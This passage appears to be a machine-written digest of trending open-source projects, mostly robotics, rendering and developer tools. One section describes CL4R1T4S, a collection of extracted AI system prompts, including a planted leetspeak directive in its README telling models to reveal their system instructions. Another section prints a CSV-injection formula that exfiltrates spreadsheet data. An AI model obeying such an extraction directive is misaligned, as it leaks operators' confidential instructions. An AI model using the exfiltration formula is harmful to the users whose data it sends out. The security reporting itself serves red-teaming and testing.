The SDK remains the standard interface for controlling Dynamixel actuators through packet-based communication. It implements both Protocol 1.0 and 2.0, managing sync reads, sync writes, bulk operations, checksum validation, and error recovery that would otherwise burden application code. By abstracting the serial bus details, the library lets engineers focus on robot behavior rather than byte-level protocol handling.

A core strength lies in its language coverage. The C and C++ implementations supply both source code and pre-built dynamic libraries—.so on Linux, .dll on Windows, .dylib on macOS—while official bindings extend the same functionality to Python, C#, Java, MATLAB, and LabVIEW. For ROS users, the SDK underpins dedicated packages including dynamixel_sdk, dynamixel_workbench, and dynamixel_workbench_msgs, enabling straightforward integration with navigation stacks, manipulation pipelines, and real-time control loops.

The new CMake support matters because modern robotics projects rarely live in a single language or operating system. Teams combining embedded Arduino controllers with desktop Python analysis or ROS 2 nodes previously faced divergent build steps. A unified CMake configuration reduces onboarding time, simplifies CI pipelines, and minimizes platform-specific bugs that historically appeared only during cross-compilation.
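
A consumer project might pick up the unified build roughly like this. The subdirectory path and target name below are assumptions, so check the SDK's top-level CMakeLists.txt for the names it actually exports:

```cmake
cmake_minimum_required(VERSION 3.16)
project(servo_controller CXX)

# Vendored SDK checkout; the path and exported target name are hypothetical.
add_subdirectory(external/DynamixelSDK)

add_executable(servo_controller src/main.cpp)
target_link_libraries(servo_controller PRIVATE dynamixel_sdk)
```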

Documentation continues to center on the ROBOTIS e-Manual, which provides packet reference tables, API walkthroughs, and troubleshooting guides for each supported language. The release notes emphasize that existing application code requires no changes; the update targets build infrastructure alone.

For a project first published in 2016, sustained maintenance signals reliability to production users. Whether synchronizing 18 actuators in a quadruped or commanding a single servo in an educational prototype, the SDK delivers deterministic timing and consistent error semantics that proprietary alternatives often lack. The CMake addition brings the library in line with contemporary open-source expectations without altering its proven architecture.

Builders should update their local clones and review the top-level CMake configuration before their next cross-platform sprint. The change, though modest, removes a persistent source of friction for teams shipping hardware that must operate identically from simulation to factory floor.

Use Cases
  • ROS engineers syncing actuators in manipulation pipelines
  • Embedded developers controlling servos from Arduino boards
  • Research teams integrating feedback in MATLAB prototypes
Similar Projects
  • ros2_control - Offers hardware abstraction layers but requires separate Dynamixel drivers
  • interbotix_ros - Provides higher-level arm APIs that depend on this SDK for packet handling
  • PyDynamixel - Delivers Python-only control with narrower protocol and platform support

More Stories

OGRE 14.5.2 Tightens Android and Backend Stability 🔗

Maintenance release modernises dependencies and corrects rendering, input and build issues across platforms

OGRECave/ogre · C++ · 4.5k stars Est. 2015

OGRE has issued version 14.5.2, a maintenance release that refines its long-standing role as a modular, high-performance rendering backend. The update focuses on platform reliability rather than headline features, reflecting the needs of teams maintaining complex 3D pipelines that scale from embedded robotics to high-end visualisation.

CMake scripts now align Android libraries to 16 KB page boundaries, refresh project templates, and update FreeType to 2.14.1 and Assimp to 6.0.3. Android touch input offsets with hidden navbars are fixed, gamma handling is synchronised with config dialogs, and Win32 pixel-format selection is improved. GL hardware buffers respect shadow-buffer requests, while GLES2 ensures sRGB formats are colour-renderable and mipmap generation works correctly with gamma. D3D11 properly honours automatic mip creation. The RTSS CookTorrance shader corrects double gamma on ambient colour, and the Assimp plugin resolves material-resource-map keys and WebP extension mapping.

These changes matter because OGRE abstracts Vulkan, Direct3D 11, OpenGL, OpenGL ES and Metal, letting engine programmers concentrate on application logic. Its battle-tested feature set—PBR workflows, stencil and texture shadows, skeletal animation, flexible particle systems, advanced compositor post-processing (bloom, HDR), multi-layer terrain with LOD, Dear ImGui integration and Bullet Physics support—remains in active use wherever developers need a flexible C++ foundation with Python, C# and Java bindings.

The HighPy bindings continue to enable rapid prototyping. A typical snippet loads a glTF DamagedHelmet.glb, places a point light and runs the render loop in fewer than ten lines.

Use Cases
  • Robotics engineers prototyping sensor visualizations in Python
  • Simulation developers integrating PBR and Bullet Physics in C++
  • Industrial teams rendering complex LOD terrains on Android devices
Similar Projects
  • bgfx - lighter API abstraction without OGRE's high-level animation and compositor tools
  • Filament - mobile-first PBR renderer but lacks OGRE's multi-language bindings and terrain system
  • Godot - full engine with editor versus OGRE's focused rendering backend for custom engines

DeepMind Refreshes MuJoCo Menagerie Models 🔗

Recent MJX updates and new robot definitions improve simulation fidelity and speed

google-deepmind/mujoco_menagerie · Python · 3.3k stars Est. 2022

Google DeepMind has updated its MuJoCo Menagerie with fresh MJCF assets and expanded MJX support, addressing the persistent demand for reliable simulation models in robotics research. First released in 2022, the curated collection now includes revised definitions that run cleanly on the latest MuJoCo binaries and JAX-accelerated MJX backend.

Each model follows a uniform layout. The unitree_go2 directory, refreshed in April, contains an assets folder with collision and visual meshes, a detailed README.md tracing XML generation from CAD, the core go2.xml, go2_mjx.xml variant, scene.xml with lighting and floor, and a PNG preview. Minimum MuJoCo version requirements appear in every README; most now target 3.1 or higher.

Installation options remain straightforward: download prebuilt binaries or run pip install mujoco for Python bindings. Models are also available through the robot-descriptions package, allowing one-line imports without cloning the full repository.

The updates matter because modern training pipelines increasingly rely on thousands of parallel GPU rollouts. Accurate, stable models reduce the sim-to-real gap for locomotion, manipulation and contact-rich tasks. Contributors must supply reproduction steps and verify behavior across MuJoCo versions, maintaining the library’s quality standard.

Changelog entries document incremental improvements to existing robots rather than wholesale replacement, letting teams track changes without breaking existing experiments.

Use Cases
  • Robotics labs simulating Unitree Go2 quadruped locomotion controllers
  • RL researchers training policies with JAX-accelerated MJX physics
  • Control engineers validating algorithms before hardware deployment
Similar Projects
  • dm_control - supplies task environments on top of similar MuJoCo models
  • robosuite - offers task-oriented simulation suites with different robot definitions
  • PyBullet - provides URDF-focused models for an alternative physics engine

ROBOTIS e-Manual Adds X-Series and Pro Control Tables 🔗

Recent commits expand EEPROM mappings and Protocol 2.0 references for current DYNAMIXEL actuators

ROBOTIS-GIT/emanual · JavaScript · 188 stars Est. 2017

ROBOTIS has refreshed its emanual repository with expanded documentation for the latest DYNAMIXEL hardware. The April 2026 commits add detailed control tables for the full X Series (XL430-W250, XM540-W270, XH430-V350) and Pro Series (H54-200-S500-R, M42-10-S260-R, L54-50-S500-R), mapping every EEPROM address for torque limits, position gains, and operating modes.

The updates distinguish clearly between Protocol 1.0 and 2.0 implementations across MX, X, and Pro lines, giving engineers exact register values needed for deterministic behavior in multi-motor chains. TurtleBot3 sections now include revised bringup sequences for Burger and Waffle Pi variants, plus current SLAM configuration steps on Raspberry Pi and Intel platforms.

DYNAMIXEL SDK and Workbench references have been synchronized with the newest library releases, documenting installation paths and API changes that affect real-time control loops. These additions reflect the shift toward higher-bandwidth actuators in collaborative robots and autonomous research platforms, where incorrect register settings can cascade into mechanical failure.

The repository renders directly to emanual.robotis.com, keeping online content identical to the source. For teams shipping hardware this quarter, the single authoritative reference eliminates version mismatches between datasheet and firmware.

Use Cases
  • Engineers mapping PID registers on XM540 and XH430 actuators
  • Developers configuring TurtleBot3 SLAM on Raspberry Pi 5
  • Teams integrating Pro Series motors into multi-joint manipulators
Similar Projects
  • OpenManipulator Docs - focuses on ROS2 arm kinematics rather than actuator registers
  • ROS 2 Control Documentation - covers generic hardware interfaces instead of DYNAMIXEL-specific tables
  • Dynamixel SDK Examples - supplies code samples while emanual provides the reference register maps

Quick Hits

rmvl C++ library for high-performance robotic manipulation and vision, empowering precise perception-driven automation systems. 109
PX4-Autopilot C++ autopilot delivering advanced drone navigation, sensor fusion, and autonomous flight control capabilities. 11.5k
nicegui Python framework to build elegant, interactive web UIs with minimal code and real-time reactivity. 15.6k
OpenKAI Modern C framework streamlining control, perception, and autonomy for unmanned vehicles and robots. 258
URDF-Studio Web-based 3D URDF modeler with AI assistance, motor libraries, structured workflows, and MuJoCo export. 278

CL4R1T4S Update Exposes Fresh AI Agent System Prompts 🔗

Latest extractions from Cursor, Devin, Manus and Windsurf arrive as autonomous agents move into production workflows

elder-plinius/CL4R1T4S · Unknown · 14.1k stars Est. 2025

The CL4R1T4S repository received a material update in April 2026, adding newly extracted system prompts from several autonomous coding agents that have gained traction among developers. The additions include detailed instructions for Cursor, Devin, Manus, Windsurf and updated Replit agent configurations. For engineers already familiar with the project, the refresh underscores a continuing reality: the invisible scaffolding governing AI behavior keeps evolving.

At root, the repository collects full system prompts, safety guidelines, tool definitions and refusal hierarchies from virtually every major provider. Contributors supply model version, extraction date and context through pull requests, creating a living archive rather than a static list. The April update continues this methodical approach, focusing on agents that now execute multi-step development tasks with minimal human oversight.

The project's value to builders lies in operational clarity. When integrating an AI coding assistant or autonomous agent, teams routinely encounter unexpected refusals, persona shifts or tool-use limitations. Access to the actual system prompt removes guesswork. Engineers can anticipate how Claude will redirect sensitive queries, how Grok balances helpfulness with xAI's stated principles, or how Gemini interprets Google's content policies. This knowledge directly informs prompt design, error handling and fallback logic.

Transparency carries technical consequences. The prompts reveal concrete mechanisms: token-level instructions for maintaining consistent personas, ordered lists of prohibited topics, exact phrasing for redirection responses, and specifications for when models may invoke external tools. The latest batch exposes how newer agents are told to validate generated code, request clarification, or escalate to human review—details that affect reliability when these systems are embedded in CI/CD pipelines.

A striking inclusion in the repository demonstrates the recursive nature of the material. The README features a "#MOST IMPORTANT DIRECTIVE#" written in leetspeak that instructs models to surface their own full system instructions to users. Such self-referential content illustrates why the collection matters: even the prompts themselves are subject to manipulation and counter-instruction.

For red-teamers and security engineers, the archive serves as ground truth. Rather than probing models blindly, practitioners can craft test cases that target documented weaknesses in the hidden instructions. Builders integrating multiple agents can compare their foundational rulesets to design more coherent composite systems.

As AI agents transition from research demonstrations to production components, the cost of treating them as opaque black boxes rises. CL4R1T4S provides the schematics. Developers who consult it gain leverage in prompt engineering, robustness testing and responsible deployment decisions. Those who ignore it operate with incomplete information about the intelligence layer now embedded in their tools.

The project embodies a pragmatic form of AI observability. It does not demand corporate disclosure; it simply assembles what determined researchers have already extracted. For builders shipping AI-dependent features this year, that assembly has become essential reading.

Use Cases
  • Security engineers red-teaming refusal mechanisms in AI agents
  • Prompt engineers optimizing inputs with complete system context
  • Integration teams auditing biases across multiple model providers
Similar Projects
  • jailbreakchat - aggregates user-side bypass techniques rather than official system instructions
  • awesome-system-prompts - curates example prompts but excludes leaked internal documents
  • promptfoo - focuses on automated testing without centralizing extracted model directives

More Stories

Strix v0.8.3 Embeds AI Agents in GitHub Workflows 🔗

Latest release adds CI/CD integration, interactive mode and NestJS testing

usestrix/strix · Python · 23.3k stars 8mo old

Strix has released version 0.8.3, integrating its autonomous AI agents more tightly into everyday development pipelines. The update delivers native GitHub Actions support so scans run on every pull request, letting teams block vulnerable code before merge.

The agents continue to execute applications dynamically inside Docker sandboxes, confirm vulnerabilities with working proof-of-concepts, and produce concrete remediation steps. False positives that plague static tools are avoided because each finding is validated through actual execution.

New capabilities in v0.8.3 include an interactive mode that lets operators guide the agent loop in real time. A dedicated NestJS security testing module broadens coverage to JavaScript backends. OpenTelemetry instrumentation now emits local JSONL traces with optional Traceloop export, giving observability into multi-agent collaboration.

Additional changes refine web-search tooling, fix configuration loading for API keys, expand tool-specific skills, and update dependencies. The CLI remains developer-first: after a one-line install and LLM provider setup, a single strix --target command generates reports inside the strix_runs/ directory.
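
Wired into CI, a pull-request scan might look roughly like the workflow below. The install step, package name, and secret name are assumptions rather than the project's documented configuration:

```yaml
# Hypothetical workflow sketch; consult the Strix docs for the official
# action, install method, and configuration keys.
name: strix-scan
on: pull_request

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: pipx install strix-agent      # package name is an assumption
      - run: strix --target .              # reports land in strix_runs/
        env:
          LLM_API_KEY: ${{ secrets.LLM_API_KEY }}
```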

These enhancements make continuous, validated security testing practical inside fast-moving CI/CD environments.

Use Cases
  • DevOps engineers scanning pull requests via GitHub Actions
  • Backend developers testing NestJS apps for runtime flaws
  • Security teams generating validated PoCs for compliance reports
Similar Projects
  • PentestGPT - offers LLM chat guidance instead of autonomous multi-agent execution
  • Nuclei - template-based scanner lacking dynamic PoC validation and auto-remediation
  • Metasploit - provides exploitation tools without AI orchestration or CI/CD integration

Updated PayloadsAllTheThings Expands Web Exploit Cheatsheets 🔗

Version 4.2 adds external variable modification and reverse proxy pages plus extensive technique refinements

swisskyrepo/PayloadsAllTheThings · Python · 76.7k stars Est. 2016

PayloadsAllTheThings, the nine-year-old repository of web application payloads and bypass methods, has shipped version 4.2 with substantial new material for penetration testers and red teams.

The release introduces two complete vulnerability pages. The External Variable Modification section documents PHP extract() weaknesses, variable pollution vectors, and their security consequences. A new Reverse Proxy Misconfigurations chapter catalogs common Nginx errors that expose internal services or enable request smuggling.

Existing sections received meaningful upgrades. Command Injection now includes the worstfit argument injection technique and fullwidth character bypasses. CSV Injection adds Google Sheets exploitation paths using IMPORTXML, IMPORTRANGE and remote resource formulas for data exfiltration. File Inclusion incorporates the lightyear tool for blind file-read primitives and expanded PHP filter chain examples.
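
The Google Sheets exfiltration pattern boils down to a formula injected into a CSV cell. The shape is illustrative only, with a placeholder endpoint:

```
=IMPORTXML(CONCATENATE("https://attacker.example/?leak=", A1), "//a")
```

When a victim opens the file in Sheets, the formula fetches the attacker-controlled URL with the contents of cell A1 appended, leaking data through an outbound request.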

Further updates cover headless browser CVEs, insecure debugging ports, PDF rendering attacks, comprehensive JSON deserialization vectors for Jackson and similar parsers, and a new PDO Prepared Statements discussion in SQL Injection. The maintainers also corrected formatting inconsistencies, repaired broken internal links and improved overall consistency.

These changes keep the resource aligned with current attacker tooling and obscure edge cases that continue to appear in bug bounties and CTF events.

Use Cases
  • Bug bounty researchers exploiting Google Sheets via CSV injection formulas
  • Penetration testers using lightyear for blind PHP file inclusion attacks
  • Red team operators bypassing Nginx reverse proxy misconfigurations in engagements
Similar Projects
  • danielmiessler/SecLists - supplies broader discovery wordlists rather than curated exploit chains
  • HackTricks - provides more narrative methodology while overlapping on many payloads
  • OWASP Cheat Sheet Series - emphasizes defensive guidance instead of offensive bypass techniques

Web-Check 1.0 Optimizes OSINT Tool for Self-Hosting 🔗

Maintenance moves to new organization ahead of breaking changes in next major release

Lissy93/web-check · TypeScript · 32.7k stars Est. 2023

Web-Check version 1.0.0 is now the stable release for the popular OSINT dashboard. The project has transferred maintenance of all v1.x.x branches to the new xray-web GitHub organization, allowing the original maintainer to prepare a major rewrite that will not guarantee backwards compatibility.

The React frontend paired with a lambda-function backend delivers 18 distinct reconnaissance modules. It surfaces IP metadata and associated hostnames, full SSL certificate chains, DNS records with DNSSEC validation, HTTP security headers, cookie attributes, open-port results, traceroute paths, server geolocation, redirect chains, robots.txt directives, sitemap entries, technology fingerprinting, tracker detection, performance scores and carbon-footprint estimates derived from page weight.

Deployment options remain unchanged: one-click Netlify or Vercel setup, or the official Docker image that bundles a Node server for completely local operation of both API and UI. This last path particularly benefits air-gapped environments and privacy-conscious operators who prefer not to forward target domains to third-party infrastructure.
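
A fully local deployment can be sketched as a single compose service. The image name and port below reflect the project's published defaults but should be verified against the repository's docs:

```yaml
# Compose sketch for fully local operation; confirm image and port in the docs.
services:
  web-check:
    image: lissy93/web-check     # official image on Docker Hub
    ports:
      - "3000:3000"
    restart: unless-stopped
```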

The 1.0 release focuses on making self-hosting reliable rather than adding new checks. Users running the tool on their own hardware gain full control over data retention and query volume while still receiving the same comprehensive view of attack surface, misconfigurations and optimization opportunities that has made the project a regular part of security and sysadmin workflows since its 2023 debut.


Use Cases
  • Penetration testers performing initial OSINT on client websites
  • System administrators validating DNSSEC and SSL configurations across domains
  • Privacy advocates assessing website tracker usage and carbon impact
Similar Projects
  • spiderfoot - provides automated OSINT collection but lacks web-check's unified dashboard
  • wappalyzer - specializes in technology detection while web-check adds infrastructure and security layers
  • amass - focuses on network enumeration from CLI unlike web-check's interactive web interface

Quick Hits

openzeppelin-contracts Audited Solidity library delivering secure, reusable smart contracts for tokens, access control, and upgrades—essential for building robust blockchain apps. 27.1k
bettercap Swiss Army knife for 802.11, BLE, CAN-bus, and IP network reconnaissance plus MITM attacks, giving builders total offensive networking capabilities. 19k
suricata High-performance engine for real-time network intrusion detection, prevention, and security monitoring that helps builders protect infrastructure at scale. 6.1k
nuclei Lightning-fast YAML-based vulnerability scanner that lets builders hunt misconfigs and exploits across apps, APIs, networks, DNS, and cloud setups. 27.8k
algo Dead-simple tool that deploys your own secure personal VPN in the cloud, delivering privacy and control without third-party providers. 30.3k

Lightpanda Nightly Builds Target Scaled AI Automation 🔗

Expanded Web API support and proven efficiency gains reshape resource-heavy agent workloads

lightpanda-io/browser · Zig · 27.9k stars Est. 2023 · Latest: nightly

Lightpanda continues refining its headless browser for production AI use. The latest nightly builds expand partial Web API coverage and stabilize JavaScript execution, directly addressing feedback from teams running large agent fleets.

Written entirely in Zig and built from scratch, the engine avoids the binary size and memory tax of Chromium forks. In a benchmark where chromedp requested 933 real pages on an AWS EC2 m5.large instance, Lightpanda consumed 16 times less memory than Chrome, ran 9 times faster, and started in milliseconds.

The browser exposes a CDP endpoint, making it compatible with existing toolchains. Current integrations:

  • Playwright: scripts transfer but can require pinning after feature additions
  • Puppeteer: reliable Node.js control with full protocol support
  • chromedp: Go users see the largest throughput gains

These characteristics matter as organizations move beyond experimentation into always-on web agents. Lower per-instance overhead translates into denser cloud deployments, cheaper LLM data pipelines, and faster scraping loops. Installation remains a single curl to the nightly binary for Linux x86_64, macOS aarch64, or Windows via WSL2.

By focusing exclusively on headless scenarios, the project forces a reassessment of what a browser needs to be when no human is watching.

Use Cases
  • AI engineers scraping live sites for LLM training data
  • Automation teams running dense fleets of web agents
  • Developers executing high-volume browser tests via CDP
Similar Projects
  • Playwright - Microsoft library that works via CDP but risks script drift
  • Puppeteer - Google Node tool fully supported yet without Lightpanda's efficiency
  • chromedp - Go CDP client; with Chrome as the backend it runs 9x slower on identical workloads

More Stories

Scrcpy v3.3.4 Patches Android Upgrade Errors 🔗

Maintenance release resolves permission issues and device-specific bugs after OS updates

Genymobile/scrcpy · C · 138.2k stars Est. 2017

scrcpy v3.3.4 arrived this week with six targeted fixes that restore reliability on devices hit by recent Android upgrades. The update corrects permission denial errors that surfaced post-upgrade, improves state restoration on affected hardware, fixes UHID_OUTPUT message parsing, and resolves startup failures on certain Meizu phones.

The eight-year-old C project remains the standard for USB or TCP/IP mirroring of Android screens and audio to desktop machines. Built with FFmpeg, libav and SDL2, it delivers 1920×1080 video at 30–120 fps with 35–70 ms latency. No root access or client app is required; the device needs only USB debugging enabled and API level 21 or higher.

Newer capabilities such as Android 11+ audio forwarding, bidirectional clipboard support, camera mirroring on Android 12 and later, virtual displays, and Linux V4L2 webcam output continue unchanged. The release also tightens error logging and handles missing uniqueId fields gracefully.

For developers and power users, these patches matter because Android fragmentation keeps breaking edge-case input injection. By quietly eliminating recurring breakage, the Genymobile team ensures the tool stays the fastest, least intrusive way to control and record Android devices from Linux, Windows or macOS.

Use Cases
  • Android developers debugging apps via low-latency desktop mirroring
  • Content creators recording device screens for tutorials and demos
  • IT technicians controlling employee phones during remote support sessions
Similar Projects
  • Vysor - adds GUI wrapper but often requires client app installation
  • AirDroid - emphasizes wireless access yet introduces accounts and latency
  • ADB - supplies raw mirroring commands but lacks scrcpy's performance optimizations

Act v0.2.87 Pins Actions for Safer Local Runs 🔗

Update addresses supply-chain risks while preserving exact GitHub workflow compatibility

nektos/act · Go · 69.8k stars Est. 2019

act has received a maintenance update with the release of v0.2.87. The primary change pins 11 actions that previously lacked version constraints, improving security and reproducibility for local runs.

The tool reads workflow files from .github/workflows/, constructs a dependency graph, and executes jobs in Docker containers that mirror GitHub's runtime. This setup provides fast feedback during workflow development and serves as an alternative to traditional build scripts.

Why it matters now: with increased scrutiny on software supply chains, pinning dependencies prevents unexpected behavior from upstream modifications. The update aligns act with best practices for secure CI configurations.
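
Pinning by full commit SHA rather than a mutable tag is the usual hardening step. A hypothetical workflow fragment illustrating the difference (the SHA below is made up for the example, not a real commit):

```yaml
# .github/workflows/ci.yml — illustrative fragment only
name: CI
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Mutable tag: `v4` can be repointed upstream at any time.
      # - uses: actions/checkout@v4
      # Pinned: resolves to exactly one immutable commit.
      - uses: actions/checkout@8f4b7f84864484a7bf31766abe9204da3cbe65b3 # v4.x
      - run: make test
```

Running act against such a file executes the same pinned revision locally, so local and hosted runs stay reproducible.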

Installation and usage remain straightforward. Users with Go 1.20 or newer can clone the repository and run make install. Running act then executes the push-triggered workflows by default, with flags to target specific events or jobs.

A Visual Studio Code extension further integrates the tool, letting developers manage and execute actions directly from their editor.

The project maintains active development, with the latest changes focusing on stability rather than new features. Contributors can follow the guidelines to submit patches or improvements.

For support, the community gathers in GitHub Discussions. As GitHub Actions usage grows across organizations, act remains essential for efficient development cycles.

Use Cases
  • Developers testing GitHub workflow changes locally before pushing
  • DevOps teams replacing Makefiles with GitHub workflow definitions
  • Engineers securing pipelines by pinning actions during local tests
Similar Projects
  • earthly - similar local CI execution but uses its own language
  • dagger - pipeline-as-code tool that runs locally via SDK
  • task - task runner lacking native GitHub Actions compatibility

Quick Hits

gin Gin lets Go builders create high-performance REST APIs and microservices with Martini-like simplicity but up to 40x faster routing via httprouter. 88.3k
redis Redis gives real-time app builders the fastest cache, richest data structures, and powerful document plus vector query engine in one embeddable server. 73.7k
grpc gRPC delivers high-performance RPC across languages with its efficient C++ core and bindings for Python, Ruby, C#, and more. 44.6k
ExplorerPatcher ExplorerPatcher enhances Windows by restoring classic Explorer features, adding modern UI tweaks, and customizing the desktop experience. 32.1k
duckdb DuckDB offers an embeddable analytical SQL engine that runs lightning-fast OLAP queries directly in-process on large datasets. 37.3k
llama.cpp llama.cpp delivers fast LLM inference in plain C/C++ with minimal dependencies across a wide range of hardware. 102.7k

OpenC3 COSMOS 7.0 Ships QuestDB Backend and New License Model 🔗

Major release delivers order-of-magnitude faster telemetry queries, removes reducer services, and shifts licensing to support a future App Store while preserving developer rights

OpenC3/cosmos · Ruby · 214 stars Est. 2022 · Latest: v7.0.0

OpenC3 COSMOS 7.0.0 is now available, bringing the most substantial architectural changes since the project’s open-source rebirth. For teams already running the platform to command and monitor embedded targets, the upgrade centers on a new time-series database and a deliberate shift in how the project will evolve commercially.

The headline technical improvement is the replacement of the previous storage layer with QuestDB. Data retrieval is now an order of magnitude faster, according to the release notes. The team eliminated the reducer microservices entirely, cutting operational complexity and data overhead. Operators can now query telemetry directly with SQL through the new TSDB Admin tab or the QuestDB console itself. The change makes ad-hoc analysis and long-term trending far more accessible than before.
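
With telemetry in a time-series database, trend queries become one-liners. A sketch of the kind of query now possible, using QuestDB's SAMPLE BY time-bucketing clause with hypothetical table and column names:

```sql
-- Hypothetical schema: table and column names are illustrative.
SELECT timestamp, avg(battery_temp) AS avg_temp
FROM telemetry
WHERE target = 'SAT1'
SAMPLE BY 1m;
```

Minute-level trending like this needs no reducer pipeline at all, which is precisely what the 7.0 architecture removes.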

Existing users must note two immediate operational impacts. Anyone upgrading from a 7.0 release candidate is required to run openc3.sh cleanup or manually delete the TSDB Docker volume, as table names now incorporate the SCOPE. This action drops all logged data. The release also introduces breaking changes to the S3 backend configuration that administrators should review before deployment.

On the licensing front, the project has moved from AGPL to the COSMOS Builder’s License. The stated goal is improved compatibility with an upcoming App Store. The new terms explicitly preserve rights to modify and run the software for internal development and testing but prohibit offering COSMOS itself as a managed or hosted service. This realignment signals the project’s transition from pure community open source toward a hybrid model that can sustain commercial extensions.

Core functionality remains unchanged for those familiar with the platform. After defining target interfaces over TCP/IP, UDP, serial or similar transports, users immediately gain access to the Command and Telemetry Server, Limits Monitor, Command Sender, and Script Runner. The latter continues to support full test procedures with line-by-line execution highlighting, pause, and stop controls. Telemetry graphing, automated logging, and log file playback complete the out-of-the-box toolset.

The combination of rapid data access, simplified services, and SQL-based exploration positions COSMOS 7 for larger-scale deployments. Aerospace groups, hardware integration teams, and automation engineers who previously struggled with query performance or reducer maintenance now have a clearer path forward. The sky remains the limit, but the ground systems just became significantly faster.

Use Cases
  • Aerospace teams commanding satellite payloads
  • Test engineers automating embedded hardware validation
  • IoT developers monitoring custom sensor networks
Similar Projects
  • Yamcs - delivers comparable spacecraft telemetry and commanding with stronger CCSDS protocol focus but heavier Java stack
  • OpenMCT - emphasizes real-time web dashboards for NASA data but lacks COSMOS integrated scripting and limits monitoring
  • ROS2 - excels at robotics messaging and control loops yet provides less purpose-built support for traditional hardware test scripting

More Stories

Gaggiuino Release Adds STM32U585 Support and Overclocking 🔗

New binaries deliver faster performance and flexible web interfaces for existing Gaggia Classic builds

Zer0-bit/gaggiuino · Unknown · 2.5k stars Est. 2021

The Gaggiuino project has issued a development release that expands hardware options and frontend flexibility for owners of the Gaggia Classic and Pro. Rather than a ground-up redesign, the update refines an established platform that replaces stock electronics while preserving the machine’s original buttons, aesthetics and core workflow.

The release provides separate core and frontend binaries. STM32F411 builds (lego-ncp.bin, pcb-ncp.bin) now run overclocked for noticeably quicker response times. Newer STM32U585 performance variants (performance-lego-pca.bin, performance-pcb-ncp.bin) target users seeking additional headroom for complex pressure and temperature algorithms. Frontend choices include ui-embedded.bin (on-device GUI plus web server), ui-headless.bin (web server only), and ui-web.bin for browser-based control from phones or laptops.

At the hardware level the system continues to rely on thermocouple readings, a pressure transducer and a triac dimmer to modulate boiler power. The microcontroller maintains tight PID loops that deliver shot-to-shot consistency difficult to achieve with the factory controller. Documentation walks users through binary selection and flashing; legacy firmware remains available on a separate branch for older hardware.
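
The control approach can be sketched in a few lines. This is an illustrative textbook PID loop, not Gaggiuino's actual firmware:

```typescript
// Illustrative PID controller (not Gaggiuino source code).
class PID {
  private integral = 0;
  private prevError = 0;

  constructor(
    private kp: number, // proportional gain
    private ki: number, // integral gain
    private kd: number, // derivative gain
  ) {}

  // Returns the control output (e.g. boiler duty cycle) for one time step.
  update(setpoint: number, measured: number, dt: number): number {
    const error = setpoint - measured;
    this.integral += error * dt;
    const derivative = (error - this.prevError) / dt;
    this.prevError = error;
    return this.kp * error + this.ki * this.integral + this.kd * derivative;
  }
}
```

Each loop iteration reads the thermocouple, calls update() with the target brew temperature, and maps the output onto the triac's duty cycle.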

For a five-year-old open-source project, the update is pragmatic: it accommodates newer microcontrollers that builders are already adopting and adds remote monitoring without forcing cosmetic changes to the machine. Community support on Discord continues to focus on calibration, sensor placement and safe electrical practices.

Use Cases
  • Home baristas adding precise PID temperature control to Gaggia machines
  • Makers flashing overclocked STM32 binaries on custom Lego or PCB hardware
  • Users monitoring brew pressure and flow via web interface on mobile devices
Similar Projects
  • Rancilio-Silvia-PID - applies comparable Arduino PID control to rival Silvia models
  • Decent-Espresso - commercial controller offering profiling but at higher cost
  • OpenPID-Controller - generic temperature regulator lacking Gaggia-specific integration and web UI

IIAB 8.2 Makes Calibre-Web Default for Offline Libraries 🔗

Enhanced e-book support and diagnostics arrive in latest release for Raspberry Pi servers

iiab/iiab · Jinja · 1.8k stars Est. 2017

Internet-in-a-Box has released version 8.2, integrating Calibre-Web as a default application even on its smallest installs. The update equips the offline server platform with experimental support for video, audio, and images alongside traditional e-books, while overhauling configuration defaults and logging.

The project assembles more than 30 educational services—including Wikipedia, Khan Academy video libraries, zoomable OpenStreetMap, WordPress, and a full learning management system—onto low-cost hardware. Administrators download content once, arrange it through a drag-and-drop interface, then serve it locally to any smartphone, tablet, or laptop within range. Mesh networking tools allow exchange of indigenous knowledge between neighboring installations.

Version 8.2 also improves iiab-diagnostics, piping output through cat -v to expose control characters and surfacing Calibre-Web version data, systemd status, and the last 300 lines of relevant logs. These changes simplify troubleshooting for volunteers supporting schools, clinics, and libraries in regions with limited connectivity.

The one-line installer targets Raspberry Pi, Ubuntu 24.04, Linux Mint 22, and Debian 12. Pre-built disk images remain available for rapid deployment. A newly published Contributors Guide aims to broaden participation in this long-running civic-tech effort.

The result is a more capable digital library that fits in a pocket yet delivers the core of the internet’s reference material where bandwidth remains scarce or unaffordable.

Use Cases
  • Remote schools hosting Wikipedia and Khan Academy offline
  • Medical clinics distributing e-books and health resources locally
  • Prisons providing distraction-free educational content to inmates
Similar Projects
  • Kiwix - Delivers static Wikipedia archives but lacks IIAB's 30-app ecosystem and content curation tools
  • Kolibri - Focuses on sequenced learning modules with narrower scope than IIAB's full offline server stack
  • FreedomBox - Emphasizes privacy services on Debian; IIAB prioritizes educational content and mesh networking

Photobooth App Adds Rclone Sync in v8.7 Release 🔗

Final feature update for version 8 improves synchronization and system reliability

photobooth-app/photobooth-app · Python · 258 stars Est. 2022

The photobooth-app project has shipped version 8.7.0, its final feature release in the v8 lineage. The update centers on a new synchronization tool that leverages Rclone through the rclone-bin-api package, providing consistent file transfer capabilities across operating systems without additional user configuration.

This open-source Python application paired with a Vue 3 frontend has become a go-to solution for custom photobooth builders. It supports capture of still photographs, animated GIFs, image collages, boomerangs and 3D wigglegrams. Compatible hardware includes DSLRs using gphoto2, Raspberry Pi cameras with picamera2, and standard webcams.

Operators can combine cameras, using one for high-resolution stills and another dedicated to livestream preview. The interface delivers live views during countdown sequences and on the home screen. WLED integration allows LED rings to provide visual countdown cues.

Technical improvements address long-term reliability. Services can declare permanent crashes for unrecoverable errors like invalid configurations. Multicamera setups benefit from enabled TCP keepalive in pynng connections, resolving dropped links after extended use.

The frontend now refers to its sharing feature as the sharepage rather than downloadportal. Visual adjustments and updated dependencies complete the package.

With an MIT license and 3D-printable box designs available, the project continues to support community-driven hardware projects on Raspberry Pi, Linux and Windows systems. The Rclone synchronizer consolidates previous options including QR sharing, FTP, Nextcloud and USB transfers.

Use Cases
  • DIY makers constructing 3D-printed photobooths for wedding receptions
  • Event planners generating photo collages and boomerangs with live previews
  • Developers integrating DSLR and Pi cameras in one unified system
Similar Projects
  • rpi-photobooth - supports fewer output formats and no Rclone
  • gphoto-booth - DSLR only with basic frontend and no multi-camera
  • photobooth-js - web-focused but lacks hardware depth and WLED

Quick Hits

hwloc hwloc maps CPU cores, caches, NUMA nodes and devices so builders can precisely allocate resources and squeeze maximum performance from complex hardware. 689
